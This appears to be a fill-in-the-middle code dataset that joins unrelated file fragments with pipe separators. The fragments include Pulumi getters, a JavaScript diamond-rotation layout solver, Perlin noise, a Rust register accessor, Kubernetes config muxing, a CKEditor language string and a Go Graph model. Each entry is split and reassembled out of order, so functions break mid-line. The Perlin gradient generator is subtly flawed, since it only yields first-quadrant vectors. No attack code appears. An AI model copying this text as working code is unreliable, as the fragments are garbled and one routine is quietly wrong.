    def local_mount_path(self) -> str:
        """
        Path where the file system is mounted inside the function.
        """
        return pulumi.get(self, "local_mount_path")
@pulumi.output_type
class GetFunctionTracingConfigResult(dict):
    """X-Ray tracing configuration reported by the function data source."""
    def __init__(__self__, *,
                 mode: str):
        """
        :param str mode: Tracing mode (see FunctionTracingConfig for the valid values).
        """
        pulumi.set(__self__, "mode", mode)
    @property
    @pulumi.getter
    def mode(self) -> str:
        """
        Tracing mode.
        """
        return pulumi.get(self, "mode")
@pulumi.output_type
class GetFunctionVpcConfigResult(dict):
def __init__(__self__, *,
security_group_ids: Sequence[str],
subnet_ids: Sequence[str],
vpc_id: str):
pulumi.set(__self__, "security_group_ids", security_group_ids)
pulumi.set(__self__, "subnet_ids", subnet_ids)
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Sequence[str]:
return pulumi.get(self, "security_group_ids")
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> Sequence[str]:
return pulumi.get(self, "subnet_ids")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> str:
return pulumi.get(self, "vpc_id") | return pulumi.get(self, "untrusted_artifact_on_deployment")
|
index.esm.js | import { toPolar, toCartesian } from 'agora-graph';
import _ from 'lodash';
import { ReformatLP, Solve } from 'javascript-lp-solver';
| var key, i;
for (i = 0; i < sourceKeys.length; i++) {
key = sourceKeys[i];
if (excluded.indexOf(key) >= 0) continue;
target[key] = source[key];
}
return target;
}
var objectWithoutPropertiesLoose = _objectWithoutPropertiesLoose;
// Babel helper: shallow-copy `source`'s own enumerable properties into a new
// object, skipping every key listed in `excluded`. String keys are handled by
// objectWithoutPropertiesLoose; own symbol keys are copied here when the
// environment supports them.
function _objectWithoutProperties(source, excluded) {
  if (source == null) return {};
  var target = objectWithoutPropertiesLoose(source, excluded);
  if (Object.getOwnPropertySymbols) {
    var symbols = Object.getOwnPropertySymbols(source);
    for (var idx = 0; idx < symbols.length; idx++) {
      var sym = symbols[idx];
      if (excluded.indexOf(sym) >= 0) continue;
      if (!Object.prototype.propertyIsEnumerable.call(source, sym)) continue;
      target[sym] = source[sym];
    }
  }
  return target;
}
var objectWithoutProperties = _objectWithoutProperties;
// Babel helper: set `key` on `obj` to `value` and return `obj`.
// Keys that already exist are (re)defined as enumerable/configurable/writable
// so the operation behaves like a plain property assignment.
function _defineProperty(obj, key, value) {
  if (!(key in obj)) {
    obj[key] = value;
    return obj;
  }
  Object.defineProperty(obj, key, {
    value: value,
    enumerable: true,
    configurable: true,
    writable: true
  });
  return obj;
}
var defineProperty = _defineProperty;
function ownKeys(object, enumerableOnly) { var keys = Object.keys(object); if (Object.getOwnPropertySymbols) { var symbols = Object.getOwnPropertySymbols(object); if (enumerableOnly) symbols = symbols.filter(function (sym) { return Object.getOwnPropertyDescriptor(object, sym).enumerable; }); keys.push.apply(keys, symbols); } return keys; }
function _objectSpread(target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] != null ? arguments[i] : {}; if (i % 2) { ownKeys(Object(source), true).forEach(function (key) { defineProperty(target, key, source[key]); }); } else if (Object.getOwnPropertyDescriptors) { Object.defineProperties(target, Object.getOwnPropertyDescriptors(source)); } else { ownKeys(Object(source)).forEach(function (key) { Object.defineProperty(target, key, Object.getOwnPropertyDescriptor(source, key)); }); } } return target; }
// Remove node overlaps by rotating the layout 45°, treating each node as a
// diamond (half-diagonal `wii`, see node2Diamond), solving a linear program
// that pushes overlapping diamonds apart while preserving the relative
// orderings, and rotating the result back.
var diamondGraphRotation = function diamondGraphRotation(graph) {
  graph.nodes.sort(function (a, b) {
    return a.index - b.index;
  });
  // Rotate every node by +45° in polar coordinates.
  var rotatedNodes = _.map(graph.nodes, function (n) {
    var polar = toPolar(n);
    polar.theta += Math.PI / 4;
    var cart = toCartesian(polar);
    return _objectSpread(_objectSpread({}, n), cart);
  });
  var vs = _.sortBy(rotatedNodes, 'x');
  var hs = _.sortBy(rotatedNodes, 'y');
  var diamonds = _.map(rotatedNodes, function (n) {
    return node2Diamond(n, _.findIndex(vs, ['index', n.index]), // i'm sure it exists
    _.findIndex(hs, ['index', n.index]) // i'm sure it exists
    );
  });
  var constraints = []; // set minimize constraint
  // Objective: minimize total displacement, sum of (x'_i - x_i) + (y'_i - y_i).
  var minimize = _(diamonds).map(function (_ref) {
    var index = _ref.index,
        x = _ref.x,
        y = _ref.y;
    return "x".concat(index, " - ").concat(x, " + y").concat(index, " - ").concat(y);
  }).join(' + ');
  constraints.push('min: ' + minimize + ';'); // sort by index
  diamonds.sort(function (a, b) {
    return a.index - b.index;
  }); // setting up orthogonal constraints
  // Keep the relative x- and y-order of the rotated nodes unchanged.
  for (var i = 0; i < diamonds.length; i++) {
    var _diamonds$i = diamonds[i],
        index = _diamonds$i.index,
        v = _diamonds$i.v,
        h = _diamonds$i.h;
    if (v + 1 < vs.length) {
      // is not last
      // x'_v(i) <= x'_v(i+1)
      constraints.push("x".concat(index, " - x").concat(vs[v + 1].index, " <= 0;"));
    }
    if (h + 1 < hs.length) {
      // is not last
      // y'_h(i) <= y'_h(i+1)
      constraints.push("y".concat(index, " - y").concat(hs[h + 1].index, " <= 0;"));
    }
  } // sort by x
  diamonds.sort(function (a, b) {
    return a.x - b.x;
  });
  // Pairwise separation constraints so diamonds i and j cannot overlap;
  // ymax/ymin prune pairs already separated transitively.
  for (var iIdx = 0; iIdx < diamonds.length; iIdx++) {
    var _diamonds$iIdx = diamonds[iIdx],
        _i = _diamonds$iIdx.index,
        yi = _diamonds$iIdx.y,
        wi = _diamonds$iIdx.wii;
    var ymax = null;
    var ymin = null;
    for (var jIdx = iIdx + 1; jIdx < diamonds.length; jIdx++) {
      var _diamonds$jIdx = diamonds[jIdx],
          j = _diamonds$jIdx.index,
          yj = _diamonds$jIdx.y,
          wj = _diamonds$jIdx.wii; // xj >= xi
      if (yi <= yj && (ymax === null || yj <= ymax)) {
        //wi is not width
        constraints.push("x".concat(j, " - x").concat(_i, " + y").concat(j, " - y").concat(_i, " >= ").concat(wi + wj, ";"));
        ymax = yj;
      }
      if (yi >= yj && (ymin === null || yj >= ymin)) {
        constraints.push("x".concat(j, " - x").concat(_i, " - y").concat(j, " + y").concat(_i, " >= ").concat(wi + wj, ";"));
        ymin = yj;
      }
    }
  } // minimal position constraint
  for (var _index = 0; _index < diamonds.length; _index++) {
    var _diamonds$_index = diamonds[_index],
        _i2 = _diamonds$_index.index,
        x = _diamonds$_index.x,
        y = _diamonds$_index.y;
    constraints.push("x".concat(_i2, " >= ").concat(x, ";"));
    constraints.push("y".concat(_i2, " >= ").concat(y, ";"));
  } // transform to js constraint
  var lpsolve = constraints.join('\n');
  var tmodel = ReformatLP(lpsolve); // console.log(lpsolve);
  var solver = Solve(tmodel);
  // NOTE(review): feasible/bounded are extracted but never checked before the
  // solution is used — confirm the LP is always feasible by construction.
  var feasible = solver.feasible,
      result = solver.result,
      bounded = solver.bounded,
      rest = objectWithoutProperties(solver, ["feasible", "result", "bounded"]); // index => {x?: y:?}
  // Remaining solver keys look like "x12"/"y12"; bucket them per node index.
  var positions = _.transform(rest, function (result, val, key) {
    var tpe = key.substr(0, 1);
    var index = key.substr(1);
    (result[index] || (result[index] = {}))[tpe] = val;
  }, {}); // rotate back to cartesian
  var rotatedPos = {};
  _.forEach(diamonds, function (_ref2) {
    var index = _ref2.index,
        x = _ref2.x,
        y = _ref2.y;
    // The solver may omit a variable (or axis) from its output; fall back to
    // the node's rotated coordinate in that case.
    var position = {
      x: positions[index] && positions[index].x ? positions[index].x : x,
      y: positions[index] && positions[index].y ? positions[index].y : y
    };
    var polar = toPolar(position);
    polar.theta -= Math.PI / 4;
    rotatedPos[index] = toCartesian(polar);
  }); // map to nodes
  var updatedNodes = _.map(graph.nodes, function (_ref3) {
    var index = _ref3.index,
        x = _ref3.x,
        y = _ref3.y,
        rest = objectWithoutProperties(_ref3, ["index", "x", "y"]);
    return _objectSpread(_objectSpread({
      index: index
    }, rest), rotatedPos[index]);
  }); // console.log(JSON.stringify(graph));
  // console.log(JSON.stringify(diamonds));
  // console.log(
  //   JSON.stringify(
  //     diamonds.map(({ wii: width, height, ...d }) => {
  //       const update: any = {};
  //       if (positions[d.index]) {
  //         if (positions[d.index].x) update.x = positions[d.index].x;
  //         if (positions[d.index].y) update.y = positions[d.index].y;
  //       }
  //       return { ...d, ...update, width: width * 2, height: height * 2 };
  //     })
  //   )
  // );
  return {
    graph: {
      nodes: updatedNodes,
      edges: graph.edges
    }
  };
};
// Build the diamond representation of a node after the 45° rotation.
// v and h are the node's ranks in the x-sorted and y-sorted orders;
// wii is the half-diagonal of the smallest diamond enclosing the node's box.
function node2Diamond(_ref4, v, h) {
  var halfDiagonal = Math.max(_ref4.height, _ref4.width) / 2 * Math.SQRT2;
  return {
    index: _ref4.index,
    x: _ref4.x,
    y: _ref4.y,
    v: v,
    h: h,
    wii: halfDiagonal
  };
}
export { diamondGraphRotation }; | function _objectWithoutPropertiesLoose(source, excluded) {
if (source == null) return {};
var target = {};
var sourceKeys = Object.keys(source); |
localeText.ts | export interface ISetFilterLocaleText {
loadingOoo: string;
blanks: string;
searchOoo: string;
selectAll: string;
selectAllSearchResults: string;
noMatches: string;
}
export const DEFAULT_LOCALE_TEXT: ISetFilterLocaleText = { | searchOoo: 'Search...',
selectAll: 'Select All',
selectAllSearchResults: 'Select All Search Results',
noMatches: 'No matches.'
}; | loadingOoo: 'Loading...',
blanks: 'Blanks', |
perlin.js | // Function to linearly interpolate between a0 and a1
// Weight w should be in the range [0.0, 1.0]
function lerp(a0, a1, w) {
return (1.0 - w)*a0 + w*a1;
// as an alternative, this slightly faster equivalent formula can be used:
// return a0 + w*(a1 - a0);
}
// Dot product of the offset vector from grid node (ix, iy) to the sample
// point (x, y) with the precomputed gradient stored at that node.
// Gradient is indexed as Gradient[iy][ix] -> [gx, gy].
function dotGridGradient(ix, iy, x, y, Gradient) {
    var g = Gradient[iy][ix];
    var dx = x - ix;
    var dy = y - iy;
    return dx * g[0] + dy * g[1];
}
// Compute Perlin noise at coordinates x, y
exports.perlin = function (x, y, Gradient) {
// Determine grid cell coordinates
let x0 = Math.floor(x);
let x1 = x0 + 1;
let y0 = Math.floor(y);
let y1 = y0 + 1;
// Determine interpolation weights
// Could also use higher order polynomial/s-curve here
let sx = x - x0;
let sy = y - y0;
// Interpolate between grid point gradients
let n0, n1, ix0, ix1, value;
n0 = dotGridGradient(x0, y0, x, y, Gradient);
n1 = dotGridGradient(x1, y0, x, y, Gradient);
ix0 = lerp(n0, n1, sx);
n0 = dotGridGradient(x0, y1, x, y, Gradient);
n1 = dotGridGradient(x1, y1, x, y, Gradient);
ix1 = lerp(n0, n1, sx);
value = lerp(ix0, ix1, sy);
return value;
}
| for (let i = 0; i < y; i++) {
let row = [];
for (let j = 0; j < x; j++) {
row[j] = generateRandomUnitVector();
}
Gradient[i] = row;
}
return Gradient;
}
function generateRandomUnitVector() {
let x = Math.random();
let y = Math.random();
let mag = Math.hypot(x, y);
return [x/mag, y/mag];
} | module.exports.generateRandomGradient= function (x, y) {
let Gradient = []; |
usboepcnf_5.rs | #[doc = "Register `USBOEPCNF_5` reader"]
pub struct R(crate::R<USBOEPCNF_5_SPEC>);
impl core::ops::Deref for R {
type Target = crate::R<USBOEPCNF_5_SPEC>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl core::convert::From<crate::R<USBOEPCNF_5_SPEC>> for R {
fn from(reader: crate::R<USBOEPCNF_5_SPEC>) -> Self {
R(reader)
}
}
#[doc = "Register `USBOEPCNF_5` writer"]
pub struct W(crate::W<USBOEPCNF_5_SPEC>);
impl core::ops::Deref for W {
type Target = crate::W<USBOEPCNF_5_SPEC>;
#[inline(always)]
fn | (&self) -> &Self::Target {
&self.0
}
}
impl core::ops::DerefMut for W {
#[inline(always)]
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl core::convert::From<crate::W<USBOEPCNF_5_SPEC>> for W {
fn from(writer: crate::W<USBOEPCNF_5_SPEC>) -> Self {
W(writer)
}
}
#[doc = "Field `USBIIE` reader - USB - Transaction Interrupt indication enable"]
pub struct USBIIE_R(crate::FieldReader<bool, bool>);
impl USBIIE_R {
pub(crate) fn new(bits: bool) -> Self {
USBIIE_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for USBIIE_R {
type Target = crate::FieldReader<bool, bool>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `USBIIE` writer - USB - Transaction Interrupt indication enable"]
pub struct USBIIE_W<'a> {
w: &'a mut W,
}
impl<'a> USBIIE_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 2)) | ((value as u8 & 0x01) << 2);
self.w
}
}
#[doc = "Field `STALL` reader - USB - Stall Condition"]
pub struct STALL_R(crate::FieldReader<bool, bool>);
impl STALL_R {
pub(crate) fn new(bits: bool) -> Self {
STALL_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for STALL_R {
type Target = crate::FieldReader<bool, bool>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `STALL` writer - USB - Stall Condition"]
pub struct STALL_W<'a> {
w: &'a mut W,
}
impl<'a> STALL_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 3)) | ((value as u8 & 0x01) << 3);
self.w
}
}
#[doc = "Field `DBUF` reader - USB - Double Buffer Enable"]
pub struct DBUF_R(crate::FieldReader<bool, bool>);
impl DBUF_R {
pub(crate) fn new(bits: bool) -> Self {
DBUF_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for DBUF_R {
type Target = crate::FieldReader<bool, bool>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `DBUF` writer - USB - Double Buffer Enable"]
pub struct DBUF_W<'a> {
w: &'a mut W,
}
impl<'a> DBUF_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 4)) | ((value as u8 & 0x01) << 4);
self.w
}
}
#[doc = "Field `TOGGLE` reader - USB - Toggle Bit"]
pub struct TOGGLE_R(crate::FieldReader<bool, bool>);
impl TOGGLE_R {
pub(crate) fn new(bits: bool) -> Self {
TOGGLE_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for TOGGLE_R {
type Target = crate::FieldReader<bool, bool>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `TOGGLE` writer - USB - Toggle Bit"]
pub struct TOGGLE_W<'a> {
w: &'a mut W,
}
impl<'a> TOGGLE_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 5)) | ((value as u8 & 0x01) << 5);
self.w
}
}
#[doc = "Field `UBME` reader - USB - UBM In-Endpoint Enable"]
pub struct UBME_R(crate::FieldReader<bool, bool>);
impl UBME_R {
pub(crate) fn new(bits: bool) -> Self {
UBME_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for UBME_R {
type Target = crate::FieldReader<bool, bool>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `UBME` writer - USB - UBM In-Endpoint Enable"]
pub struct UBME_W<'a> {
w: &'a mut W,
}
impl<'a> UBME_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 7)) | ((value as u8 & 0x01) << 7);
self.w
}
}
impl R {
#[doc = "Bit 2 - USB - Transaction Interrupt indication enable"]
#[inline(always)]
pub fn usbiie(&self) -> USBIIE_R {
USBIIE_R::new(((self.bits >> 2) & 0x01) != 0)
}
#[doc = "Bit 3 - USB - Stall Condition"]
#[inline(always)]
pub fn stall(&self) -> STALL_R {
STALL_R::new(((self.bits >> 3) & 0x01) != 0)
}
#[doc = "Bit 4 - USB - Double Buffer Enable"]
#[inline(always)]
pub fn dbuf(&self) -> DBUF_R {
DBUF_R::new(((self.bits >> 4) & 0x01) != 0)
}
#[doc = "Bit 5 - USB - Toggle Bit"]
#[inline(always)]
pub fn toggle(&self) -> TOGGLE_R {
TOGGLE_R::new(((self.bits >> 5) & 0x01) != 0)
}
#[doc = "Bit 7 - USB - UBM In-Endpoint Enable"]
#[inline(always)]
pub fn ubme(&self) -> UBME_R {
UBME_R::new(((self.bits >> 7) & 0x01) != 0)
}
}
impl W {
#[doc = "Bit 2 - USB - Transaction Interrupt indication enable"]
#[inline(always)]
pub fn usbiie(&mut self) -> USBIIE_W {
USBIIE_W { w: self }
}
#[doc = "Bit 3 - USB - Stall Condition"]
#[inline(always)]
pub fn stall(&mut self) -> STALL_W {
STALL_W { w: self }
}
#[doc = "Bit 4 - USB - Double Buffer Enable"]
#[inline(always)]
pub fn dbuf(&mut self) -> DBUF_W {
DBUF_W { w: self }
}
#[doc = "Bit 5 - USB - Toggle Bit"]
#[inline(always)]
pub fn toggle(&mut self) -> TOGGLE_W {
TOGGLE_W { w: self }
}
#[doc = "Bit 7 - USB - UBM In-Endpoint Enable"]
#[inline(always)]
pub fn ubme(&mut self) -> UBME_W {
UBME_W { w: self }
}
#[doc = "Writes raw bits to the register."]
pub unsafe fn bits(&mut self, bits: u8) -> &mut Self {
self.0.bits(bits);
self
}
}
#[doc = "Output Endpoint_5: Configuration\n\nThis register you can [`read`](crate::generic::Reg::read), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [usboepcnf_5](index.html) module"]
pub struct USBOEPCNF_5_SPEC;
impl crate::RegisterSpec for USBOEPCNF_5_SPEC {
type Ux = u8;
}
#[doc = "`read()` method returns [usboepcnf_5::R](R) reader structure"]
impl crate::Readable for USBOEPCNF_5_SPEC {
type Reader = R;
}
#[doc = "`write(|w| ..)` method takes [usboepcnf_5::W](W) writer structure"]
impl crate::Writable for USBOEPCNF_5_SPEC {
type Writer = W;
}
#[doc = "`reset()` method sets USBOEPCNF_5 to value 0"]
impl crate::Resettable for USBOEPCNF_5_SPEC {
#[inline(always)]
fn reset_value() -> Self::Ux {
0
}
}
| deref |
config.go | /*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package config
import (
"sync"
"k8s.io/apimachinery/pkg/util/wait"
)
// Merger is an interface that allows funcs and structs to
// be able to receive updates and merge.
type Merger interface {
// Invoked when a change from a source is received. May also function as an incremental
// merger if you wish to consume changes incrementally. Must be reentrant when more than
// one source is defined.
Merge(source string, update interface{}) error
}
// MergeFunc implements the Merger interface
type MergeFunc func(source string, update interface{}) error
// Merge will allow an update to be merged with a source
// using MergeFunc f and return its result.
func (f MergeFunc) Merge(source string, update interface{}) error {
return f(source, update)
}
// Mux is a class for merging configuration from multiple sources. Changes are
// pushed via channels and sent to the merge function.
type Mux struct {
// Invoked when an update is sent to a source.
merger Merger
// Sources and their lock.
sourceLock sync.RWMutex
// Maps source names to channels
sources map[string]chan interface{}
} |
// NewMux creates a new mux that can merge changes from multiple sources.
func NewMux(merger Merger) *Mux {
	return &Mux{
		sources: make(map[string]chan interface{}),
		merger:  merger,
	}
}
// Channel returns a channel where a configuration source
// can send updates of new configurations. Multiple calls with the same
// source will return the same channel. This allows change and state based sources
// to use the same channel. Different source names however will be treated as a
// union.
func (m *Mux) Channel(source string) chan interface{} {
	if len(source) == 0 {
		panic("Channel given an empty name")
	}
	m.sourceLock.Lock()
	defer m.sourceLock.Unlock()
	channel, exists := m.sources[source]
	if exists {
		return channel
	}
	newChannel := make(chan interface{})
	m.sources[source] = newChannel
	// First registration for this source: start a dedicated consumer
	// goroutine. wait.NeverStop means the listener (and therefore the
	// channel) lives for the lifetime of the process; sources are never
	// deregistered.
	go wait.Until(func() { m.listen(source, newChannel) }, 0, wait.NeverStop)
	return newChannel
}
// listen pumps updates from listenChannel into the merger until the channel
// is closed. It runs on its own goroutine, one per registered source.
func (m *Mux) listen(source string, listenChannel <-chan interface{}) {
	for update := range listenChannel {
		// NOTE(review): any error returned by Merge is silently dropped here.
		m.merger.Merge(source, update)
	}
}
// Accessor is an interface for retrieving the current merge state.
type Accessor interface {
// MergedState returns a representation of the current merge state.
// Must be reentrant when more than one source is defined.
MergedState() interface{}
}
// AccessorFunc implements the Accessor interface.
type AccessorFunc func() interface{}
// MergedState will call and return the return value of AccessorFunc f().
func (f AccessorFunc) MergedState() interface{} {
return f()
}
// Listener interface allows for listening of changes and can invoke OnUpdate
// when a change is made.
type Listener interface {
// OnUpdate is invoked when a change is made to an object.
OnUpdate(instance interface{})
}
// ListenerFunc receives a representation of the change or object.
type ListenerFunc func(instance interface{})
// OnUpdate receives a representation of the change or object
// and invokes ListenerFunc f upon receiving the update.
func (f ListenerFunc) OnUpdate(instance interface{}) {
f(instance)
}
// Broadcaster is a struct that will contain a mutex
// and an array of Listener objects.
type Broadcaster struct {
// Listeners for changes and their lock.
listenerLock sync.RWMutex
listeners []Listener
}
// NewBroadcaster registers a set of listeners that support the Listener interface
// and notifies them all on changes.
func NewBroadcaster() *Broadcaster {
return &Broadcaster{}
}
// Add registers listener to receive updates of changes.
func (b *Broadcaster) Add(listener Listener) {
	b.listenerLock.Lock()
	defer b.listenerLock.Unlock()
	// Appending under the write lock keeps Notify's snapshot consistent.
	b.listeners = append(b.listeners, listener)
}
// Notify notifies all listeners.
func (b *Broadcaster) Notify(instance interface{}) {
	b.listenerLock.RLock()
	// Snapshot the slice header so OnUpdate callbacks run without holding
	// the lock. Listeners are only ever appended, so the elements visible
	// through this snapshot are never mutated.
	listeners := b.listeners
	b.listenerLock.RUnlock()
	for _, listener := range listeners {
		listener.OnUpdate(instance)
	}
}
ar.js | /*
Copyright (c) 2003-2016, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license | */
CKEDITOR.plugins.setLang( 'showblocks', 'ar', {
toolbar: 'مخطط تفصيلي'
} ); |
|
media.go | package graph
import (
i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55 "github.com/microsoft/kiota/abstractions/go/serialization"
)
// Media
type Media struct {
// Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
additionalData map[string]interface{};
// Device information associated with the callee endpoint of this media.
calleeDevice *DeviceInfo;
// Network information associated with the callee endpoint of this media.
calleeNetwork *NetworkInfo;
// Device information associated with the caller endpoint of this media.
callerDevice *DeviceInfo;
// Network information associated with the caller endpoint of this media.
callerNetwork *NetworkInfo;
// How the media was identified during media negotiation stage.
label *string;
// Network streams associated with this media.
streams []MediaStream;
}
// NewMedia instantiates a new media and sets the default values.
func NewMedia()(*Media) |
// GetAdditionalData gets the AdditionalData property value. Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
// Returns nil when called on a nil receiver.
func (m *Media) GetAdditionalData()(map[string]interface{}) {
    if m == nil {
        return nil
    }
    return m.additionalData
}
// GetCalleeDevice gets the calleeDevice property value. Device information associated with the callee endpoint of this media.
func (m *Media) GetCalleeDevice()(*DeviceInfo) {
if m == nil {
return nil
} else {
return m.calleeDevice
}
}
// GetCalleeNetwork gets the calleeNetwork property value. Network information associated with the callee endpoint of this media.
func (m *Media) GetCalleeNetwork()(*NetworkInfo) {
if m == nil {
return nil
} else {
return m.calleeNetwork
}
}
// GetCallerDevice gets the callerDevice property value. Device information associated with the caller endpoint of this media.
func (m *Media) GetCallerDevice()(*DeviceInfo) {
if m == nil {
return nil
} else {
return m.callerDevice
}
}
// GetCallerNetwork gets the callerNetwork property value. Network information associated with the caller endpoint of this media.
func (m *Media) GetCallerNetwork()(*NetworkInfo) {
if m == nil {
return nil
} else {
return m.callerNetwork
}
}
// GetLabel gets the label property value. How the media was identified during media negotiation stage.
func (m *Media) GetLabel()(*string) {
if m == nil {
return nil
} else {
return m.label
}
}
// GetStreams gets the streams property value. Network streams associated with this media.
func (m *Media) GetStreams()([]MediaStream) {
if m == nil {
return nil
} else {
return m.streams
}
}
// GetFieldDeserializers the deserialization information for the current model
func (m *Media) GetFieldDeserializers()(map[string]func(interface{}, i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode)(error)) {
res := make(map[string]func(interface{}, i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode)(error))
res["calleeDevice"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetObjectValue(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return NewDeviceInfo() })
if err != nil {
return err
}
if val != nil {
m.SetCalleeDevice(val.(*DeviceInfo))
}
return nil
}
res["calleeNetwork"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetObjectValue(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return NewNetworkInfo() })
if err != nil {
return err
}
if val != nil {
m.SetCalleeNetwork(val.(*NetworkInfo))
}
return nil
}
res["callerDevice"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetObjectValue(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return NewDeviceInfo() })
if err != nil {
return err
}
if val != nil {
m.SetCallerDevice(val.(*DeviceInfo))
}
return nil
}
res["callerNetwork"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetObjectValue(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return NewNetworkInfo() })
if err != nil {
return err
}
if val != nil {
m.SetCallerNetwork(val.(*NetworkInfo))
}
return nil
}
res["label"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetStringValue()
if err != nil {
return err
}
if val != nil {
m.SetLabel(val)
}
return nil
}
res["streams"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetCollectionOfObjectValues(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return NewMediaStream() })
if err != nil {
return err
}
if val != nil {
res := make([]MediaStream, len(val))
for i, v := range val {
res[i] = *(v.(*MediaStream))
}
m.SetStreams(res)
}
return nil
}
return res
}
func (m *Media) IsNil()(bool) {
return m == nil
}
// Serialize serializes information the current object
func (m *Media) Serialize(writer i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.SerializationWriter)(error) {
{
err := writer.WriteObjectValue("calleeDevice", m.GetCalleeDevice())
if err != nil {
return err
}
}
{
err := writer.WriteObjectValue("calleeNetwork", m.GetCalleeNetwork())
if err != nil {
return err
}
}
{
err := writer.WriteObjectValue("callerDevice", m.GetCallerDevice())
if err != nil {
return err
}
}
{
err := writer.WriteObjectValue("callerNetwork", m.GetCallerNetwork())
if err != nil {
return err
}
}
{
err := writer.WriteStringValue("label", m.GetLabel())
if err != nil {
return err
}
}
{
cast := make([]i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable, len(m.GetStreams()))
for i, v := range m.GetStreams() {
temp := v
cast[i] = i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable(&temp)
}
err := writer.WriteCollectionOfObjectValues("streams", cast)
if err != nil {
return err
}
}
{
